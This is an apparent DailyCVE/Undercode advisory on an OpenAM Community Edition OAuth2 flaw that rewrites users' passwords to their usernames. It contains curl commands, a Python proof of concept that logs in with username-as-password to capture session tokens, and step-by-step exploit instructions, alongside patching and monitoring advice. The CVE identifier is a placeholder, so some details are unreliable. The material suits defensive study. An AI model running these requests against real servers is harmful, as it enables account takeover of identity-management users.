OpenAM, Unverified Password Change (CWE-620) and Use of Weak Credentials (CWE-1391), CVE-2026-XXXX (Critical) -DC-Jun2026-676

Listen to this Post

How CVE-2026-XXXX Works

The vulnerability resides in OpenAM Community Edition’s OAuth2 authentication module, specifically in the account linking and update logic that fires during OAuth2 re-login of an existing local account.
When a user authenticates via OAuth2 and the identity provider’s profile resolves against an existing local identifier, OpenAM’s account update path is triggered. This path contains a critical flaw: it silently rewrites the user’s local password to the literal string of their username without any verification, re-authentication, or confirmation (CWE-620: Unverified Password Change). The module then persists these weak credentials (CWE-1391: Use of Weak Credentials).
For new users, the password rewrite typically fires after two OAuth logins. For pre-existing users whose IdP profile matches an existing local identifier, the rewrite happens on the very first re-login. The default `ldapService` authentication chain then accepts the username as both the identifier and the password, allowing an unauthenticated attacker to obtain a valid session via the standard authenticate endpoint.
Usernames shorter than the default minimum password length have the rewrite silently denied, meaning very short administrative accounts are not affected. Additionally, the same update path marks accounts active on every OAuth login, silently reactivating disabled accounts.
Successful exploitation grants the attacker a session carrying the victim principal’s privileges, enabling full account takeover and lateral movement within the IAM infrastructure.

DailyCVE Form

Platform: OpenAM Community Edition
Version: through 16.0.6
Vulnerability: Unverified Password Change + Weak Credentials
Severity: Critical
date: 2026-06-26

Prediction: 2026-06-30

What Undercode Say

Check OpenAM version
curl -s http://target:8080/openam/version | grep "Version"
Verify OAuth2 module is enabled
curl -s http://target:8080/openam/oauth2/.well-known/openid-configuration | jq .
Test for vulnerability - attempt authentication with username as password
curl -X POST http://target:8080/openam/json/realms/root/authenticate \
-H "Content-Type: application/json" \
-d '{"username":"victim","password":"victim"}'
If successful, capture the tokenId from response
tokenId: AQIC5wM2... (session token)
Python PoC - Unauthenticated session hijacking
import requests
import json
target = "http://target:8080"
username = "target_user"
Attempt authentication with username as password
resp = requests.post(
f"{target}/openam/json/realms/root/authenticate",
json={"username": username, "password": username},
headers={"Content-Type": "application/json"}
)
if resp.status_code == 200:
token = resp.json().get("tokenId")
print(f"[+] Session obtained for {username}: {token}")
Validate session
session_check = requests.post(
f"{target}/openam/json/sessions/{token}",
headers={"Authorization": f"Bearer {token}"}
)
print(f"[+] Session valid: {session_check.status_code == 200}")
else:
print(f"[-] Not vulnerable or user not affected")

Exploit

  1. Identify target – Enumerate valid usernames through OpenAM’s user query endpoints or IdP profile resolution
  2. Trigger OAuth2 flow – Initiate OAuth2 authorization against the target realm with a known IdP profile that resolves to the victim’s local account
  3. Password rewrite – The OAuth2 module silently sets victim’s password to their username string
  4. Authenticate – Use the standard `/json/realms/root/authenticate` endpoint with both username and password set to the victim’s username
  5. Session capture – Receive a valid session token (tokenId) carrying the victim’s privileges
  6. Impersonate – Use the captured session to access protected resources, administrative endpoints, or perform privilege escalation

Protection

  • Immediate: Upgrade to OpenAM Community Edition version 16.1.1 or higher
  • Workaround: Disable account creation in OAuth2 authentication module (non-default configuration)
  • Workaround: Enforce minimum password length greater than typical username length to prevent the rewrite
  • Workaround: Remove `ldapService` from the default authentication chain
  • Monitoring: Audit OAuth2 authentication logs for unusual re-login patterns
  • Monitoring: Watch for authentication attempts where username equals password

Impact

  • Authentication Bypass: Unauthenticated attackers gain valid sessions for any affected user account
  • Account Takeover: Full compromise of victim accounts with their associated privileges
  • Privilege Escalation: Low-privileged users can escalate to higher-privileged accounts
  • Data Breach: Access to sensitive identity data, tokens, and federated resources
  • Lateral Movement: Attackers can pivot to connected systems and applications using the compromised IAM session
  • Compliance Violation: Breach of GDPR, HIPAA, and other regulatory requirements due to unauthorized access to PII
  • Business Disruption: Potential for denial of service through account lockouts or malicious administrative actions

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top